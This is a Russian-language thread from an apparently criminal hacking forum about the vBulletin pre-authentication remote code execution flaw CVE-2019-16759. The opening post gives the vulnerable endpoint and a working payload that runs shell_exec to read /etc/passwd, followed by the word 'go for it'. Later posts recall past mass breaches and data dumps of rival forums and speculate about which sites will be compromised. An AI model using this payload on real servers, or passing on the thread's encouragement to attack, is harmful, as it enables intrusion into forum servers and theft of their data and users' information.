• XSS.stack #1 – первый литературный журнал от юзеров форума

vBulletin 0day RCE (CVE-2019-16759)

Отслеживать

astroscylla

CD-диск
Пользователь
Регистрация
17.09.2019
Сообщения
16
Реакции
29
Сегодня в твиттере была опубликована забавная preauth rce-уязвимость для vBulletin (5.0.0 - 5.5.4) и эксплоит для неё.

Уязвимый запрос POST-запрос:
Код: 
target.com/ajax/render/widget_php
Пэйлоад:
Код: 
widgetConfig[code]=echo shell_exec('cat /etc/passwd');

Дерзайте.
 
Дополню:

Анонимный исследователь обнародовал в открытом доступе детали опасной уязвимости нулевого дня в форумном движке vBulletin. Теперь ИБ-специалисты опасаются, что публикация детальной информации о проблеме и Python-эксплоита для нее могут спровоцировать массовую волну взломов форумов.

Подробности о 0–day баге можно найти на страницах рассылки Full Disclosure. Сообщается, что данная RCE-уязвимость позволяет злоумышленнику выполнять shell-команды на сервере с vBulletin. Причем атакующему достаточно использовать простой HTTP POST-запрос и не нужно иметь учетную запись на целевом форуме, то есть проблема относится к неприятному классу pre-authentication уязвимостей. Пожалуй, единственная хорошая новость в данной ситуации заключается в том, что 0-day работает только с версиями форума vBulletin 5.x (вплоть до новейшей 5.5.4), а более ранние версии багу не подвержены.

 
Dtramp сказал(а):
И что?
Ситуация достаточно неприятная. Этот баг в ограниченном доступе 3 года, как сегодня заявил Zerodium. Он мог быть в руках аверов, органов, ФБР, космонавтов, НЛО (кого угодно). Эксплуатация простейшая. А много крупных форумов в нашей сфере до сих пор работают на булке (те же вериф, маза, даркмани).
Такие "открытия" всегда очень неприятные. Кто постарше, помнят уязвимость (скулю) в IPB 1.3. Пока выпустили патч, дак экспом от RST/VOID к тому моменту слили 99% форумов.
 
Админ прав на 100%, конкретно про ипб - это год четвертый или пятый, сам участвовал в паре сливов. На ачате грейт или кто то из гринов мне закинул ее, вроде грейт, сам не практиковал, он или ресерчил или где то откопал (царство небесное, удивительный был человек). На тот момент еще 0day был, не публиковалась нигде. Эхх времена, одеями делились без проблем, комерция еще не так плотно проникла во все сферы крайма... были за "идею", форумы делали друг другу дружественные дефейсы, чтобы ткнуть на уязвимость - а не сливали базы и монетизировали, угоняли акки, кидали, етк... Это действительно важная новость, и пока апдейтнутся многие - куча форумов улетит в сливы. А не пресловутое "и что"!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
admin сказал(а):
Ситуация достаточно неприятная. Этот баг в ограниченном доступе 3 года, как сегодня заявил Zerodium. Он мог быть в руках аверов, органов, ФБР, космонавтов, НЛО (кого угодно). Эксплуатация простейшая. А много крупных форумов в нашей сфере до сих пор работают на булке (те же вериф, маза, даркмани).
Такие "открытия" всегда очень неприятные. Кто постарше, помнят уязвимость (скулю) в IPB 1.3. Пока выпустили патч, дак экспом от RST/VOID к тому моменту слили 99% форумов.
я раньше на експе сидел и только
но как сменили дизайн форума начали принимать людей и я подумал что то тут не то....
вериф, маза, даркмани
по мне эти форумы уже отжили свое, когда уже уйдет в приват этот форум?
 
Последнее редактирование:
Dtramp сказал(а):
вериф, маза, даркмани
по мне эти форумы уже отжили свое, когда уже уйдет в приват этот форум?
Ты не прав,пока аналогов нет и в ближайшее время не предвидится. Для чего в приват, чтобы и этот форум "отжил свое"?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Desoxyn сказал(а):
Админ прав на 100%, конкретно про ипб - это год четвертый или пятый, сам участвовал в паре сливов. На ачате грейт или кто то из гринов мне закинул ее, вроде грейт, сам не практиковал, он или ресерчил или где то откопал (царство небесное, удивительный был человек). На тот момент еще 0day был, не публиковалась нигде. Эхх времена, одеями делились без проблем, комерция еще не так плотно проникла во все сферы крайма... были за "идею", форумы делали друг другу дружественные дефейсы, чтобы ткнуть на уязвимость - а не сливали базы и монетизировали, угоняли акки, кидали, етк... Это действительно важная новость, и пока апдейтнутся многие - куча форумов улетит в сливы. А не пресловутое "и что"!
да было бы что сливать....
вы покажите мне форумы эти... может я слеп
я пока вижу 1 форум нормальный и мы с вами на нем
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Desoxyn сказал(а):
Ты не прав,пока аналогов нет и в ближайшее время не предвидится. Для чего в приват, чтобы и этот форум "отжил свое"?
я и не спорю с вами
вы старше вам виднее
маза и вериф вообще живы?
 
admin сказал(а):
Ситуация достаточно неприятная. Этот баг в ограниченном доступе 3 года, как сегодня заявил Zerodium. Он мог быть в руках аверов, органов, ФБР, космонавтов, НЛО (кого угодно). Эксплуатация простейшая. А много крупных форумов в нашей сфере до сих пор работают на булке (те же вериф, маза, даркмани).
Такие "открытия" всегда очень неприятные. Кто постарше, помнят уязвимость (скулю) в IPB 1.3. Пока выпустили патч, дак экспом от RST/VOID к тому моменту слили 99% форумов.

вериф лежит уже несколько часов.
 
admin сказал(а):
Ситуация достаточно неприятная. Этот баг в ограниченном доступе 3 года, как сегодня заявил Zerodium. Он мог быть в руках аверов, органов, ФБР, космонавтов, НЛО (кого угодно). Эксплуатация простейшая. А много крупных форумов в нашей сфере до сих пор работают на булке (те же вериф, маза, даркмани).
Такие "открытия" всегда очень неприятные. Кто постарше, помнят уязвимость (скулю) в IPB 1.3. Пока выпустили патч, дак экспом от RST/VOID к тому моменту слили 99% форумов.
Я особо не встречал форумов в "нашей" сфере, которые используют 5ю линейку, потому что она явно не очень похожа на привычный форум
 
Пожалуйста, обратите внимание, что пользователь заблокирован
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх